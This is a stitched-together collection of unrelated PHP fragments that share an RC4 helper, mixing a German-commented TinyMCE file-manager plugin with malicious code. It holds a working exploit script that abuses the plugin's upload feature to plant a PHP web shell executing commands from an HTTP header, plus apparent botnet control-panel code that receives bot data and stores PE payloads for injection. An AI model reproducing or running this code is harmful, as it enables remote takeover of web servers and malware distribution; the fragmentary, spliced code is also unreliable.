function ShowSubFolders($dir_root, $dir, $depth, $treemenu) { global $SESSION; global $GET2; if ($depth >= 1) { $folders = GetFolders($dir, explode(",", $SESSION["hidden_subfolder"])); } else { $folders = GetFolders($dir, explode(",", $SESSION["hidden_folder"])); } if (count($folders) == 0) { return; } if ($depth >= 1) { echo "<div class=\"sub_tree_menu\"><ul>"; } else { echo "<div><ul>"; } for ($i = 0; $i < count($folders); $i++) { if ($SESSION["dir"] == $dir . $folders[$i] . "/") { echo "<li><a id=\"active\" href=\"javascript:;\">"; $SESSION["folder"] = $folders[$i]; } else { echo "<li><a href=\"javascript:;\" onclick=\"SMExplorer_OpenFolder('" . bin2hex(RC4("id=1&treemenu=" . $treemenu . "&dir=" . $dir . $folders[$i] . "/&" . $GET2)) . "'); if (window.event){ window.event.returnValue = false; }\">"; } echo "<img style=\"margin:0px; margin-left:4px;\" src=\"img/icon_tree_16x16.png\" border=\"0\" /><img src=\"img/icon_folder_16x16.png\" border=\"0\" />" . $folders[$i]; if ($SESSION["show_chmod"] == 1) { echo "<span style=\"margin-left:3px; font-size:7pt; color:#c4d3f6; font-weight:normal;\">[" . GetChmod($dir_root) . "]</span>"; } echo "</a></li>"; // Unterordner anzeigen ShowSubFolders($dir_root, $dir . $folders[$i] . "/", $depth + 1, $treemenu); } echo "</ul></div>"; }
function GetServerData() { global $bot_id, $data_type, $raw_data; //if (defined('D_DEBUG')) $str = $_GET['str']; else $str = file_get_contents('php://input'); if (!$str) { if (defined('D_DEBUG')) { logerror("Error: E1"); } else { error404(); } } //if (!defined('D_DEBUG')) $str = RC4($str, $_SERVER['HTTP_HOST']); bdecodestr($str, $bot_id, $data_type, $raw_data); if (defined('D_DEBUG')) { logerror($bot_id . " | " . $data_type . " | " . strlen($raw_data)); } if (!isset($bot_id) || empty($bot_id) || !isset($data_type) || empty($data_type)) { if (defined('D_DEBUG')) { logerror("Error: E2"); } else { error404(); } } }
function GetServerData() { global $bot_id, $data_type, $raw_data; $str = file_get_contents('php://input'); if (!$str) { debug("Error: E1"); error404(); } $str = RC4($str, $_SERVER['HTTP_HOST']); bdecodestr($str, $bot_id, $data_type, $raw_data); debug($bot_id . " | " . $data_type . " | " . strlen($raw_data)); if (!isset($bot_id) || empty($bot_id) || !isset($data_type) || empty($data_type)) { debug("Error: E2"); error404(); } }
<?php // Initialisierung $SESSION = array(); $QUERY = array(); // Query-Zeichenkette entschlüsseln if (isset($_GET["get"])) { parse_str(RC4(@pack("H*", $_GET["get"])), $QUERY); } else { include "error.php"; die; } // Query-Zeichenkette auf Vollständigkeit überprüfen if (!isset($QUERY["id"]) || !isset($QUERY["check_session_variable"])) { include "error.php"; die; } // Verzeichnispfad überprüfen if ($CONFIG["directory"] != "" && $CONFIG["directory"][0] != "/") { $CONFIG["directory"] = "/" . $CONFIG["directory"]; } if ($CONFIG["directory"] != "" && $CONFIG["directory"][strlen($CONFIG["directory"]) - 1] != "/") { $CONFIG["directory"] = $CONFIG["directory"] . "/"; } // Serverpfad überprüfen if ($CONFIG["server"] != "" && $CONFIG["server"][strlen($CONFIG["server"]) - 1] == "/") { $CONFIG["server"] = substr($CONFIG["server"], 0, -1); } // Initialisierung $SESSION["id"] = "1"; $SESSION["back"] = "0";
<form style="padding:10px;" name="form_upload" action="" method="post" enctype="multipart/form-data"> <div style="margin-bottom:2px;"><b><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smexplorer.upload_label_1', '?'));</script>:</b></div> <div><input id="upload_input_1" style="margin-bottom:8px;" type="file" name="input1" size="64" onchange="SMExplorer_Upload_ShowFileName();"></div> <div style="margin-bottom:2px;"><b><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smexplorer.upload_label_2', '?'));</script>:</b></div> <div><input id="upload_edit_1" style="width:90%;" type="text" name="edit1" maxlength="50"><input id="upload_edit_2" style="width:40px; border-left:0px; font-weight:bold; background-color:#f6f9fb;" type="text" name="edit2" readonly></div> <div style="margin-top:12px; margin-bottom:57px;"> <script language="javascript" type="text/javascript"> /* <![CDATA[ */ var jSMB_U1 = new jSMButton(); jSMB_U1.SetStyle('float:left;'); jSMB_U1.Paint('jSMB_U1', tinyMCEPopup.getLang('smexplorer.upload_button_1', '?'), 'SMExplorer_Upload_Save(\'<?php echo bin2hex(RC4("id=2&" . $GET)); ?> \');'); var jSMB_U2 = new jSMButton(); jSMB_U2.SetStyle('float:left; margin-left:20px;'); jSMB_U2.Paint('jSMB_U2', tinyMCEPopup.getLang('smexplorer.upload_button_2', '?'), 'SMExplorer_Upload_Close();'); /* ]]> */ </script> </div> <div id="upload_info"> <table border="0" cellspacing="0" cellpadding="0"> <tr> <td><b><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smexplorer.upload_info_1', '?'));</script>:</b></td> <td><?php if ($SESSION["upload_filetype"] != "") { echo str_replace(',', ', ', $SESSION["upload_filetype"]); } else {
/** * Compute U value */ function _Uvalue() { return RC4($this->encryption_key, $this->padding); }
if ($CONFIG["show_preview"] == 1) { $a = array(); $a = GetNewImageSize($SESSION["dir"] . $FILES[$i], 200); // Bilddatei mit Thumbnail-Anzeige $icon = "<div id=\"th" . $i . "\" class=\"jsmpreview\"></div><img style=\"cursor:pointer;\" src=\"img/icon_image_16x16.png\" border=\"0\" onmouseover=\"jSMP.Show(\\'th" . $i . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $a["width"] . "\\', \\'" . $a["height"] . "\\');\" onmouseout=\"jSMP.Close(\\'th" . $i . "\\');\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />"; unset($a); } else { // Bilddatei ohne Thumbnail-Anzeige $icon = "<img style=\"cursor:pointer;\" src=\"img/icon_image_16x16.png\" border=\"0\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />"; } } else { // Keine Bilddatei $icon = "<img style=\"cursor:pointer;\" src=\"img/icon_file_16x16.png\" border=\"0\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />"; } if ($SESSION["show_file_menu"] == 1) { echo "jSMT.AddData(Array('<input id=\"td_checkbox" . $i . "\" name=\"td_checkbox" . $i . "\" class=\"checkbox\" type=\"checkbox\" value=\"0\" onclick=\"SMExplorer_Check(" . count($FILES) . ");\" />', '" . $icon . "', '<input id=\"fn_input" . $i . "\" name=\"fn_input" . $i . "\" class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$i] . "\" title=\"" . $FILES[$i] . "\" onclick=\"SMExplorer_InputClick(this, " . $CONFIG["rename_file_ext"] . ");\" onblur=\"SMExplorer_InputBlur(this, \\'" . $FILES[$i] . "\\');\" onkeypress=\"SMExplorer_InputEnter(event, this, \\'" . $FILES[$i] . "\\', \\'" . bin2hex(RC4("id=1&" . $GET)) . "\\');\">', '<img id=\"i1" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_insert_16x16.png\" border=\"0\" title=\"\" onclick=\"SMExplorer_Insert(\\'" . $SESSION["server"] . "\\', \\'" . $SESSION["dir"] . $FILES[$i] . "\\', \\'" . $SESSION["link_target"] . "\\');\" />', '<img id=\"i3" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_show_16x16.png\" border=\"0\" title=\"\" onclick=\"SMExplorer_View_Show(\\'" . $SESSION["dir"] . $FILES[$i] . "\\');\" />', '<img id=\"i2" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_delete_16x16.png\" border=\"0\" title=\"\" onclick=\"SMExplorer_DeleteFile(\\'" . bin2hex(RC4("id=1&" . $GET)) . "\\', \\'" . $FILES[$i] . "\\');\" />', '" . number_format(@filesize(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i]) / 1024, 2, ",", ".") . " KB', '" . date(GetDateFormat() . ' H:i', @filemtime(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i])) . "'), Array('width:18px; text-align:center;', 'width:18px; text-align:center;', '', 'width:16px; text-align:center;', 'width:16px; text-align:center;', 'width:16px; text-align:center;', 'width:102px; text-align:right;', 'width:122px; text-align:center;'));"; } else { echo "jSMT.AddData(Array('" . $icon . "', '<input id=\"fn_input" . $i . "\" name=\"fn_input" . $i . "\" class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$i] . "\" title=\"" . $FILES[$i] . "\" readonly=\"1\">', '" . number_format(@filesize(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i]) / 1024, 2, ",", ".") . " KB', '" . date(GetDateFormat() . ' H:i', @filemtime(GetDocumentRoot() . $SESSION["dir"] . $FILES[$i])) . "'), Array('width:18px; text-align:center;', '', 'width:16px; text-align:center;', 'width:102px; text-align:right;', 'width:122px; text-align:center;'));"; } } ?> // Tabelle zeichnen jSMT.Paint(); <?php // Hinweis hinzufügen for ($i = 0; $i < count($FILES); $i++) { echo "document.getElementById('i1" . $i . "').title = tinyMCEPopup.getLang('smexplorer.file_menu_hint_1', '?'); document.getElementById('i2" . $i . "').title = tinyMCEPopup.getLang('smexplorer.file_menu_hint_2', '?'); document.getElementById('i3" . $i . "').title = tinyMCEPopup.getLang('smexplorer.file_menu_hint_3', '?');"; } ?>
<ul> <?php echo "<li><a id=\"m12\" href=\"javascript:;\" title=\"\" onclick=\"window.location.href='index.php?get=" . bin2hex(RC4("id=1&" . $GET)) . "'; if (window.event){ window.event.returnValue = false; }\"><img src=\"img/icon_image_24x24.png\" border=\"0\" /></a></li>"; echo "<li><img class=\"separator\" src=\"img/icon_separator.png\" border=\"0\" /></li>"; ?> </ul>
die; } $host = $argv[1]; $path = $argv[2]; $packet = "GET {$path} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Connection: close\r\n\r\n"; preg_match("/PHPSESSID=([^;]*);/i", http_send($host, $packet), $m); $sid = $m[1]; $payload = "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"edit1\"\r\n\r\n.php\r\n"; $payload .= "--o0oOo0o\r\n"; $payload .= "Content-Disposition: form-data; name=\"input1\"; filename=\"foo\"\r\n\r\n"; $payload .= "<?php \${error_reporting(0)}.\${print(_code_)}.\${passthru(base64_decode(\$_SERVER[HTTP_CMD]))} ?>\r\n"; $payload .= "--o0oOo0o--\r\n"; $get = bin2hex(RC4("id=1&check_session_variable=jak_lastURL&upload_filetype=php&dir={$path}cache/sh")); $packet = "POST {$path}js/editor/plugins/jakadminexplorer/?action=upload&get={$get} HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cookie: PHPSESSID={$sid}\r\n"; $packet .= "Content-Length: " . strlen($payload) . "\r\n"; $packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n"; $packet .= "Connection: close\r\n\r\n"; $packet .= $payload; if (preg_match("/Error/", http_send($host, $packet))) { die("\n[-] Upload failed!\n"); } $packet = "GET {$path}cache/sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; while (1) {
if (($SESSION["page"] + 1) * $SESSION["thumbnails_perpage"] < count($FILES)) { echo "<li><a id=\"m4\" href=\"javascript:;\" title=\"\" onclick=\"window.location.href='index.php?get=" . bin2hex(RC4("id=1&page=" . ($SESSION["page"] + 1) . "&" . $GET)) . "'; if (window.event){ window.event.returnValue = false; }\"><img src=\"img/icon_forward_24x24.png\" border=\"0\" /></a></li>"; } else { echo "<li><a id=\"m4\" href=\"javascript:;\" title=\"\"><img src=\"img/icon_forward_2_24x24.png\" border=\"0\" /></a></li>"; } } ?> <li><img class="separator" src="img/icon_separator.png" border="0" /></li> <li><a id="m5" href="javascript:;" title="" onclick="SMImage_PageReload('<?php echo bin2hex(RC4("id=1&" . $GET)); ?> '); if (window.event){ window.event.returnValue = false; }"><img src="img/icon_reload_24x24.png" border="0" /></a></li> <li><img class="separator" src="img/icon_separator.png" border="0" /></li> <li><select class="select" id="Select1" name="Select1" size="1" onChange="location.href=this.options[this.selectedIndex].value;"><option <?php if ($SESSION["show_thumbnail"] == 1) { echo "selected"; } ?> value="index.php?get=<?php echo bin2hex(RC4("id=1&show_thumbnail=1&" . str_replace("&show_thumbnail=0", "", $GET))); ?> "><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smimage.menu_view_select_1', '?'));</script></option><option <?php if ($SESSION["show_thumbnail"] == 0) { echo "selected"; } ?> value="index.php?get=<?php echo bin2hex(RC4("id=1&show_thumbnail=0&" . str_replace("&show_thumbnail=1", "", $GET))); ?> "><script language="javascript" type="text/javascript">document.write(tinyMCEPopup.getLang('smimage.menu_view_select_2', '?'));</script></option></select></li> </ul>
if (isset($_POST['fAdd'])) { $newname = './files/' . randstr(30); $ctx = file_get_contents($_FILES['fFile']['tmp_name']); $arr = unpack('v1doshdr/@60/Llfa_new/C*bytes', $ctx); if ($arr['doshdr'] == 23117) { $fileheader[0] = $arr['bytes' . ($arr['lfa_new'] - 59)]; $fileheader[1] = $arr['bytes' . ($arr['lfa_new'] - 58)]; if ($fileheader[0] == 76 && $fileheader[1] == 1) { $PEarch = "X86"; } else { if ($fileheader[0] == 100 && $fileheader[1] == 134) { $PEarch = "X64"; } } if (!empty($PEarch) && ($fh = fopen($newname, "w+"))) { if (fwrite($fh, RC4($ctx, explode('/', $newname)[2]))) { $file = array('fArch' => $PEarch, 'fName' => $_POST['fName'], 'fVer' => $_POST['fVer'], 'fInject' => $_POST['fInject'], 'fFilePath' => $newname, 'fDate' => date('Y-m-d H:i:s', strtotime('now')), 'fConnectedWith' => $_POST['tConnectedWith'], 'fArgs' => $_POST['fArgs']); if ($db->insert('files', $file)) { metaRefresh('?act=files'); } } else { echo "Error while write file"; } fclose($fh); } else { echo "Error while open file or file is not valid PE image."; } unset($arr); } else { echo "Not a PE file."; }
// Icon mit Thumbnail-Anzeige bei "onmouseover" $a = array(); $a = GetNewImageSize($IMAGE_PATH_2 . $FILES[$j], 200); echo "<td style=\"width:18px; text-align:center;\"><div id=\"smpreview" . $j . "\" class=\"smpreview\"></div><img style=\"cursor:pointer;\" src=\"img/icon_image_16x16.png\" border=\"0\" onmouseover=\"SMP.Show('smpreview" . $j . "', '" . $IMAGE_PATH_2 . $FILES[$j] . "', '" . $a["width"] . "', '" . $a["height"] . "');\" onmouseout=\"SMP.Close('smpreview" . $j . "');\" onclick=\"SMImage_Insert('" . $SESSION["server"] . "', '" . $IMAGE_PATH_2 . $FILES[$j] . "', '" . Image_GetWidth($IMAGE_PATH . $FILES[$j]) . "', '" . Image_GetHeight($IMAGE_PATH . $FILES[$j]) . "', '" . $CONFIG["style"] . "');\" /></td>"; unset($a); // Dateiname if ($SESSION["show_image_menu"] == 1) { echo "<td><input class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$j] . "\" title=\"" . $FILES[$j] . "\" onclick=\"SMImage_InputFileClick(this);\" onblur=\"SMImage_InputFileBlur(this, '" . $FILES[$j] . "');\" onkeypress=\"SMImage_InputFileEnter(event, this, '" . $FILES[$j] . "', '" . bin2hex(RC4("id=1&" . $GET)) . "')\"></td>"; } else { echo "<td><input class=\"edit\" style=\"width:98%;\" type=\"text\" value=\"" . $FILES[$j] . "\" title=\"" . $FILES[$j] . "\" readonly=\"1\"></td>"; } // Icon "Bild einfügen" echo "<td style=\"width:16px; text-align:center;\"><img id=\"i1" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_insert_16x16.png\" border=\"0\" title=\"\" onclick=\"SMImage_Insert('" . $SESSION["server"] . "', '" . $IMAGE_PATH_2 . $FILES[$j] . "', '" . Image_GetWidth($IMAGE_PATH . $FILES[$j]) . "', '" . Image_GetHeight($IMAGE_PATH . $FILES[$j]) . "', '" . $CONFIG["style"] . "');\" /></td>"; // Icon "Bilddatei löschen" if ($SESSION["show_image_menu"] == 1) { echo "<td style=\"width:16px; text-align:center;\"><img id=\"i2" . $i . "\" style=\"cursor:pointer;\" src=\"img/icon_delete_16x16.png\" border=\"0\" title=\"\" onclick=\"SMImage_DeleteImage('" . bin2hex(RC4("id=1&" . $GET)) . "', '" . $FILES[$j] . "');\" /></td>"; } // Dateigröße echo "<td style=\"width:102px; text-align:right;\">" . number_format(@filesize($IMAGE_PATH . $FILES[$j]) / 1024, 2, ",", ".") . " KB</td>"; // Bildgröße echo "<td style=\"width:102px; text-align:right;\">" . Image_GetWidth($IMAGE_PATH . $FILES[$j]) . " x " . Image_GetHeight($IMAGE_PATH . $FILES[$j]) . "</td>"; // Datum echo "<td style=\"width:122px; text-align:center;\">" . date(GetDateFormat() . ' H:i', @filemtime($IMAGE_PATH . $FILES[$j])) . "</td>"; // ScrollBar echo "<td style=\"width:10px;\"> </td>"; echo "</tr>"; // Hinweis hinzufügen echo "<script language=\"javascript\" type=\"text/javascript\">document.getElementById('i1" . $i . "').title = tinyMCEPopup.getLang('smimage.image_menu_hint_1', '?'); document.getElementById('i2" . $i . "').title = tinyMCEPopup.getLang('smimage.image_menu_hint_2', '?');</script>"; $i++; } echo "</table></div>";
function str_decrypt($str) { $str = base64_decode(rawurldecode($str)); $str = RC4($str, KEY); return $str; }
} if (!isset($_GET['add'])) { $files = $db->query('SELECT * FROM `files`')->fetchAllAssoc(); echo "<table cellpadding='3' cellspacing='3' width='100%' style=''><tr><td width='100%'>"; echo "<table cellpadding='3' cellspacing='0' width='100%' class='light_table box' rules='all'>\r\n <tr><th>Num</th><th>Name</th><th>Version</th><th>Added</th><th>Path</th><th>Action</th></tr>"; $count = 0; foreach ($files as $file) { $color = $count % 2 ? "#d3e7f0" : "#ebf4f8"; echo "<tr bgcolor='{$color}' onmouseover=\"this.style.background='#ffffff'\" onmouseout=\"this.style.background='{$color}'\">\r\n <td align='center'><b>{$file['fId']}</b></td>\r\n <td align='center'>{$file['fName']}</td>\r\n <td align='center'>{$file['fVer']}</td>\r\n <td align='center'>{$file['fDate']}</td>\r\n <td align='center'>{$file['fFilePath']}</td>\r\n <td align='center'><a href='?act=files&del=" . $file['fId'] . "'>Delete</a></td>\r\n </tr>"; $count++; } } else { echo "<form action='?act=files&add' method='post' enctype='multipart/form-data'>\r\n <table cellpadding='3' cellspacing='3' width='100%'>\r\n <tr>\r\n <td class='td_col_zag' width='30%'>Name</td>\r\n <td class='td_col_list' width='70%'>\r\n <input name='fName' type='text' value=''>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td class='td_col_zag' width='30%'>Version</td>\r\n <td class='td_col_list' width='70%'>\r\n <input name='fVer' type='text' value=''>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td class='td_col_zag' width='30%'>File</td>\r\n <td class='td_col_list' width='70%'>\r\n <input type='file' name='fFile'>\r\n </td>\r\n </tr>\r\n <tr>\r\n <td> </td>\r\n <td><input type='submit' value='Add' name='fAdd'></td>\r\n </tr>\r\n </table>\r\n </form>"; if (isset($_POST['fAdd'])) { $newname = './files/' . randstr(30); $ctx = file_get_contents($_FILES['fFile']['tmp_name']); if ($fh = fopen($newname, "w+")) { if (fwrite($fh, RC4($ctx, "1"))) { $file = array('fName' => $_POST['fName'], 'fVer' => $_POST['fVer'], 'fInject' => "", 'fFilePath' => $newname, 'fDate' => date('Y-m-d H:i:s', strtotime('now'))); if ($db->insert('files', $file)) { metaRefresh('?act=files'); } } else { echo "Error while write file"; } fclose($fh); } else { echo "Error while open file"; } } }